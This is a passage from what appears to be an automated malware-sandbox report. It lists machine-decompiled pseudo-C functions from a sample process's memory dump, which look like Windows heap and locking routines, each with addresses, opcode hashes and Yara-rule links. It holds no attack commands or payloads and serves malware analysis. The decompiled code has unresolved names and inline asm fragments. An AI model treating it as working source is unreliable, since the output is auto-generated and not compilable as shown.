													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0xbab1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0xba84c0;
																			if(_t82 >=  *0xba84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E00B89063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E00AB922A(_t99);
										_t64 = L00AD7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = L00B88B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0xba86c0; // 0x6507b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0xba86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0xba86bc;
													_t87 = 0xba86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E00AB9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0xba86c4;
												_t87 = 0xba86c0;
												L27:
												E00AE9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E00B0D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0xba5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0xba538c = _t51;
						goto L6;
					}
				}
			}




















                            0x00ab9082
                            0x00ab9083
                            0x00ab9084
                            0x00ab9085
                            0x00ab9087
                            0x00ab9096
                            0x00ab9098
                            0x00ab9098
                            0x00ab909e
                            0x00ab90a8
                            0x00ab90e7
                            0x00ab90e7
                            0x00ab90aa
                            0x00ab90b0
                            0x00ab90b7
                            0x00ab90bd
                            0x00ab90dd
                            0x00ab90e6
                            0x00ab90bf
                            0x00ab90bf
                            0x00ab90c7
                            0x00ab90cf
                            0x00ab90f1
                            0x00ab90f2
                            0x00ab90f4
                            0x00ab90f5
                            0x00ab90f6
                            0x00ab90f7
                            0x00ab90f8
                            0x00ab90f9
                            0x00ab90fa
                            0x00ab90fb
                            0x00ab90fc
                            0x00ab90fd
                            0x00ab90fe
                            0x00ab90ff
                            0x00ab9100
                            0x00ab9102
                            0x00ab9107
                            0x00ab910c
                            0x00ab9110
                            0x00ab9113
                            0x00ab9115
                            0x00ab9136
                            0x00ab913f
                            0x00ab9143
                            0x00b137e4
                            0x00b137e4
                            0x00ab9117
                            0x00ab9117
                            0x00ab911d
                            0x00000000
                            0x00ab911f
                            0x00ab911f
                            0x00ab9125
                            0x00000000
                            0x00ab9127
                            0x00ab912d
                            0x00ab9130
                            0x00ab9134
                            0x00ab9158
                            0x00ab915d
                            0x00ab9161
                            0x00ab9168
                            0x00b13715
                            0x00ab916e
                            0x00ab916e
                            0x00ab9175
                            0x00ab9177
                            0x00ab917e
                            0x00ab917f
                            0x00ab9182
                            0x00ab9182
                            0x00ab9187
                            0x00ab9187
                            0x00ab918a
                            0x00ab918d
                            0x00ab918f
                            0x00ab9192
                            0x00ab9195
                            0x00ab9198
                            0x00ab9198
                            0x00ab9198
                            0x00ab919a
                            0x00000000
                            0x00000000
                            0x00b1371f
                            0x00b13721
                            0x00b13727
                            0x00b1372f
                            0x00b13733
                            0x00b13735
                            0x00b13738
                            0x00b1373b
                            0x00b1373d
                            0x00b13740
                            0x00000000
                            0x00b13746
                            0x00b13746
                            0x00b13749
                            0x00000000
                            0x00b1374f
                            0x00b1374f
                            0x00b13751
                            0x00b13757
                            0x00b13759
                            0x00b1375c
                            0x00b1375c
                            0x00b1375e
                            0x00b1375e
                            0x00b13761
                            0x00b13764
                            0x00000000
                            0x00000000
                            0x00b13766
                            0x00b13768
                            0x00b137a3
                            0x00b137a3
                            0x00b137a5
                            0x00b137a7
                            0x00b137ad
                            0x00b137b0
                            0x00b137b2
                            0x00b137bc
                            0x00b137c2
                            0x00b137c2
                            0x00b137b2
                            0x00ab9187
                            0x00ab9187
                            0x00ab918a
                            0x00ab918d
                            0x00ab918f
                            0x00ab9192
                            0x00ab9195
                            0x00000000
                            0x00ab9195
                            0x00000000
                            0x00b1376a
                            0x00b1376a
                            0x00b1376a
                            0x00b1376c
                            0x00b1376c
                            0x00b1376f
                            0x00b13775
                            0x00000000
                            0x00000000
                            0x00b13777
                            0x00b13779
                            0x00b13782
                            0x00b13787
                            0x00b13789
                            0x00b13790
                            0x00b13790
                            0x00b1378b
                            0x00b1378b
                            0x00b1378b
                            0x00b13792
                            0x00b13795
                            0x00000000
                            0x00b13795
                            0x00000000
                            0x00b13779
                            0x00b13798
                            0x00000000
                            0x00b13798
                            0x00000000
                            0x00b13768
                            0x00b1379b
                            0x00b1379b
                            0x00b13751
                            0x00b13749
                            0x00000000
                            0x00b13740
                            0x00ab91a0
                            0x00ab91a3
                            0x00ab91a9
                            0x00ab91b0
                            0x00000000
                            0x00ab91b0
                            0x00ab9187
                            0x00ab91b4
                            0x00ab91b4
                            0x00ab91bb
                            0x00ab91c0
                            0x00ab91c5
                            0x00ab91c7
                            0x00b137da
                            0x00ab91cd
                            0x00ab91cd
                            0x00ab91cd
                            0x00ab91d2
                            0x00ab91d5
                            0x00ab9239
                            0x00ab9239
                            0x00ab91d7
                            0x00ab91db
                            0x00ab91e1
                            0x00ab91e7
                            0x00ab91fd
                            0x00ab9203
                            0x00ab921e
                            0x00ab9223
                            0x00000000
                            0x00ab9205
                            0x00ab9205
                            0x00ab9208
                            0x00ab920c
                            0x00ab9214
                            0x00ab9214
                            0x00ab920c
                            0x00ab91e9
                            0x00ab91e9
                            0x00ab91ee
                            0x00ab91f3
                            0x00ab91f3
                            0x00ab91f3
                            0x00ab91e7
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ab9134
                            0x00ab9125
                            0x00ab911d
                            0x00ab914e
                            0x00ab90d1
                            0x00ab90d1
                            0x00ab90d3
                            0x00ab90d6
                            0x00ab90d8
                            0x00000000
                            0x00ab90d8
                            0x00ab90cf

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ba16bbdde32b1c5d3623c6985edf0725c8950d170763c6a9e904d8fa8c525c9f
                            • Instruction ID: 87f1db563e6284eac34aad5cc57fbb9de2446dad1ba77de22cc5dad42fcbdab3
                            • Opcode Fuzzy Hash: ba16bbdde32b1c5d3623c6985edf0725c8950d170763c6a9e904d8fa8c525c9f
                            • Instruction Fuzzy Hash: 0101A473905A049FC725AF18D840B92BBF9EF96320F254076E6068B7A2C774DD41CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B84015, Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            C-Code - Quality: 86%
                            			E00B84015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E00AD2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E00AD2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0xba86ac);
					E00ABF900(0xba86d4, _t28);
					L00ACFFB0(0xba86ac, _t28, 0xba86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					L00ACFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                            0x00b8401a
                            0x00b8401e
                            0x00b84023
                            0x00b84028
                            0x00b84029
                            0x00b8402b
                            0x00b8402f
                            0x00b84043
                            0x00b84046
                            0x00b84051
                            0x00b84057
                            0x00b8405f
                            0x00b84062
                            0x00b84067
                            0x00b8406f
                            0x00b8407c
                            0x00b8407c
                            0x00b8408c
                            0x00b8408c
                            0x00b84097

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 34802b9a692711d96e69cc7c46a67eb71289d190144eb9c2987052f1a08b7de8
                            • Instruction ID: 4ffeebfd3a624a124237cda696ce2a1ea430fde2f6848778e483288721c2762e
                            • Opcode Fuzzy Hash: 34802b9a692711d96e69cc7c46a67eb71289d190144eb9c2987052f1a08b7de8
                            • Instruction Fuzzy Hash: 85018F722019457FD211AB79CE81E57F7ACFF45760B00026AB50883A22DB24EC11C7E4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B7138A, Relevance: .0, Instructions: 48COMMON
                            Download Yara Rule
                            C-Code - Quality: 79%
                            			E00B7138A(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0xbad360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E00AFFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(L00AD7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				return L00AFB640(E00AF9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
			}

















                            0x00b7138a
                            0x00b7138a
                            0x00b71399
                            0x00b713a3
                            0x00b713a8
                            0x00b713aa
                            0x00b713b5
                            0x00b713bb
                            0x00b713c3
                            0x00b713c6
                            0x00b713c9
                            0x00b713d4
                            0x00b713e6
                            0x00b713d6
                            0x00b713df
                            0x00b713df
                            0x00b713f1
                            0x00b713f2
                            0x00b713f4
                            0x00b7140e

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d85251187c94a1cf1314b0c1dd0fbf44a4e0a17663998025f3c12fead2765633
                            • Instruction ID: 5ce13adccedd53a9ce97b82bedd54b3e26ece852e2af7b393bc122fa19563b86
                            • Opcode Fuzzy Hash: d85251187c94a1cf1314b0c1dd0fbf44a4e0a17663998025f3c12fead2765633
                            • Instruction Fuzzy Hash: 27019271A0020CAFCB14EFA9D942FAEB7B8EF44700F004066B905EB381EA709A01CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AB58EC, Relevance: .0, Instructions: 47COMMON
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E00AB58EC(void* __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				void* _t17;
				void* _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0xbad360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0xa95c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E00AB5943() != 0 &&  *0xba5320 > 5) {
					L00B37B5E( &_v44, _t27);
					_t22 =  &_v28;
					L00B37B5E( &_v28, _t28);
					_t11 = E00B37B9C(0xba5320, 0xa9bf15,  &_v28, _t22, 4,  &_v76);
				}
				return L00AFB640(_t11, _t17, _v8 ^ _t29, 0xa9bf15, _t27, _t28);
			}















                            0x00ab58fb
                            0x00ab58fe
                            0x00ab5906
                            0x00ab590a
                            0x00ab593c
                            0x00ab593c
                            0x00ab590c
                            0x00ab590c
                            0x00ab5911
                            0x00000000
                            0x00ab5913
                            0x00ab5913
                            0x00ab5913
                            0x00ab5911
                            0x00ab591d
                            0x00b11035
                            0x00b1103c
                            0x00b1103f
                            0x00b11056
                            0x00b11056
                            0x00ab593b

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 33ceda2f9f47610a6ff333bb0647dd46187358f423303b63a15a1daa7002b39c
                            • Instruction ID: af8615bc03f2f4c48c68066a40cd4db2663dd70501e8fa0aa6b3a0eba1ea8d6b
                            • Opcode Fuzzy Hash: 33ceda2f9f47610a6ff333bb0647dd46187358f423303b63a15a1daa7002b39c
                            • Instruction Fuzzy Hash: 1C018471E14908DBCB24DB79DD12AEEB7FCEB85370F5400A9A91597252EE30DD018694
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ACB02A, Relevance: .0, Instructions: 46COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00ACB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(L00AD7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E00B37016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                            0x00acb037
                            0x00acb039
                            0x00acb03b
                            0x00acb040
                            0x00b1a60e
                            0x00000000
                            0x00000000
                            0x00b1a61d
                            0x00acb04b
                            0x00acb04e
                            0x00b1a627
                            0x00b1a634
                            0x00000000
                            0x00000000
                            0x00b1a641
                            0x00b1a653
                            0x00b1a643
                            0x00b1a64c
                            0x00b1a64c
                            0x00b1a65b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b1a66c
                            0x00acb057
                            0x00acb057
                            0x00acb057
                            0x00acb046
                            0x00acb046
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                            • Instruction ID: 9ca93d7ca6017e0082ca5864ff01908f207f98a9e5b8070472069bdeeca38b29
                            • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                            • Instruction Fuzzy Hash: 1D01DF322159809FD726C71CC988FA777E8EB41740F0A00E5F919CBA51DB39EC80D625
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B81074, Relevance: .0, Instructions: 46COMMON
                            Download Yara Rule
                            C-Code - Quality: 54%
                            			E00B81074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v11;
				unsigned int _v12;
				intOrPtr _v15;
				void* __esi;
				void* __ebp;
				unsigned int _t13;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 = _t13;
				if(_a4 != 0) {
					_push((_t13 >> 0x14) + (_t13 >> 0x14));
					L00B8165E(__ebx, 0xba8ae4, (__edx -  *0xba8b04 >> 0x14) + (__edx -  *0xba8b04 >> 0x14), __edi, __ecx, (__edx -  *0xba8b04 >> 0x14) + (__edx -  *0xba8b04 >> 0x14));
				}
				_push( *((intOrPtr*)(_t35 + 0x38)));
				_push( *((intOrPtr*)(_t35 + 0x34)));
				_push(0x8000);
				L00B7AFDE( &_v8,  &_v12);
				if(L00AD7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = L00B6FE3F(_t22, _t35, _v11, _v15);
				}
				return _t16;
			}












                            0x00b81074
                            0x00b81080
                            0x00b81082
                            0x00b8108a
                            0x00b8108f
                            0x00b81093
                            0x00b810a8
                            0x00b810ab
                            0x00b810ab
                            0x00b810b0
                            0x00b810b7
                            0x00b810be
                            0x00b810c3
                            0x00b810cf
                            0x00b810e1
                            0x00b810d1
                            0x00b810da
                            0x00b810da
                            0x00b810e9
                            0x00b810f5
                            0x00b810f5
                            0x00b810fe

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 11ffc4b7ab523cc576be526ba84f31a2bd928fb8504bbb615dfc5c81cf6380f1
                            • Instruction ID: 269c3da565e91419c54f7bbbeaf0d4f4f2717bf5424f575f1792d600c64c76c3
                            • Opcode Fuzzy Hash: 11ffc4b7ab523cc576be526ba84f31a2bd928fb8504bbb615dfc5c81cf6380f1
                            • Instruction Fuzzy Hash: D70128725057419FC710EB28CD41B1A77E9EB84310F04C969F885836A1EE35D881CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B88A62, Relevance: .0, Instructions: 44COMMON
                            Download Yara Rule
                            C-Code - Quality: 77%
                            			E00B88A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0xbad360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(L00AD7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				return L00AFB640(E00AF9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}
















                            0x00b88a62
                            0x00b88a71
                            0x00b88a79
                            0x00b88a82
                            0x00b88a85
                            0x00b88a89
                            0x00b88a8c
                            0x00b88a8f
                            0x00b88a92
                            0x00b88a95
                            0x00b88a9f
                            0x00b88ab1
                            0x00b88aa1
                            0x00b88aaa
                            0x00b88aaa
                            0x00b88abc
                            0x00b88abd
                            0x00b88abf
                            0x00b88ada

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fc0bae69c1df903f676cef683b05bf6bbfd2224a130a8a67aa73f4a2e5de2269
                            • Instruction ID: cff38ba629559fccd416312a683b9beea86e38cfdc7ccb2fdd78b94bed1500f8
                            • Opcode Fuzzy Hash: fc0bae69c1df903f676cef683b05bf6bbfd2224a130a8a67aa73f4a2e5de2269
                            • Instruction Fuzzy Hash: 74012171A0021C9FCB04EFA9D9419EEB7F8EF49310F50405AF905E7351EA34A901CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ABB1E1, Relevance: .0, Instructions: 42COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00ABB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(L00AD7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(L00AD7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E00B37016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                            0x00abb1e8
                            0x00abb1ea
                            0x00abb1f3
                            0x00b14a17
                            0x00abb1f9
                            0x00abb1f9
                            0x00abb1f9
                            0x00abb201
                            0x00b14a21
                            0x00b14a2e
                            0x00000000
                            0x00000000
                            0x00b14a3b
                            0x00b14a4d
                            0x00b14a3d
                            0x00b14a46
                            0x00b14a46
                            0x00b14a55
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00abb20a
                            0x00abb20a
                            0x00abb20a
                            0x00abb20a

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                            • Instruction ID: 1d19591b819849cb6fa5de37643299591ca019fcc67c1fa444d767227a8fb261
                            • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                            • Instruction Fuzzy Hash: B701F4326646809BD326975DC904FE97BDDEF42750F5900A2F9148B6B2EBB8CC40C724
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B72073, Relevance: .0, Instructions: 32COMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E00B72073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = L00B6FD22(__ecx);
				_t19 =  *0xba849c - _t3; // 0x56f5447a
				if(_t19 == 0) {
					__eflags = _t17 -  *0xba8748; // 0x0
					if(__eflags <= 0) {
						L00B71C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0xba8724 & 0x00000004;
							if(( *0xba8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0xba8724; // 0x0
					_push( !_t7 >> 0x00000002 & 0x00000001);
					return L00B68DF1(__ebx, 0xc0000374, 0xba5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                            0x00b72076
                            0x00b72078
                            0x00b7207d
                            0x00b72083
                            0x00b720a4
                            0x00b720aa
                            0x00b720ac
                            0x00b720b7
                            0x00b720ba
                            0x00b720bc
                            0x00b720c9
                            0x00b720c9
                            0x00b720d0
                            0x00b720d2
                            0x00000000
                            0x00b720d2
                            0x00b720be
                            0x00b720c3
                            0x00b720c5
                            0x00b720c7
                            0x00000000
                            0x00000000
                            0x00b720c7
                            0x00b720bc
                            0x00b720d4
                            0x00b72085
                            0x00b72085
                            0x00b7209c
                            0x00b720a3
                            0x00b720a3

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e96a27956ed1eb88e025c19b4afbeac42736a320485f47f870bde24d9559a6f6
                            • Instruction ID: fdcc167c64f1ad3d04c06d7b1a44147683b6cc72c6b302987a9cf43ab5024cf8
                            • Opcode Fuzzy Hash: e96a27956ed1eb88e025c19b4afbeac42736a320485f47f870bde24d9559a6f6
                            • Instruction Fuzzy Hash: BCF0E57B4291954ADF326B3879033E53BD4E756310F1984D6E8B85B602CD388D83DB70
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF927A, Relevance: .0, Instructions: 32COMMON
                            Download Yara Rule
                            C-Code - Quality: 54%
                            			E00AF927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L00AD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E00AFFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E00AF92C6(_t11, _t14);
				}
				return _t11;
			}





                            0x00af9295
                            0x00af9299
                            0x00af929f
                            0x00af92aa
                            0x00af92ad
                            0x00af92ae
                            0x00af92af
                            0x00af92b0
                            0x00af92b4
                            0x00af92bb
                            0x00af92bb
                            0x00af92c5

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                            • Instruction ID: 8bbd59c7ad840f28af0eb0fac310f6bb46bea1ce3fde0d0e9b160e9395374883
                            • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                            • Instruction Fuzzy Hash: 9FE0ED322406002BE721AF8ACC81B6376A9AF82720F004079BA041E283CAE6DC0887A0
                            Uniqueness

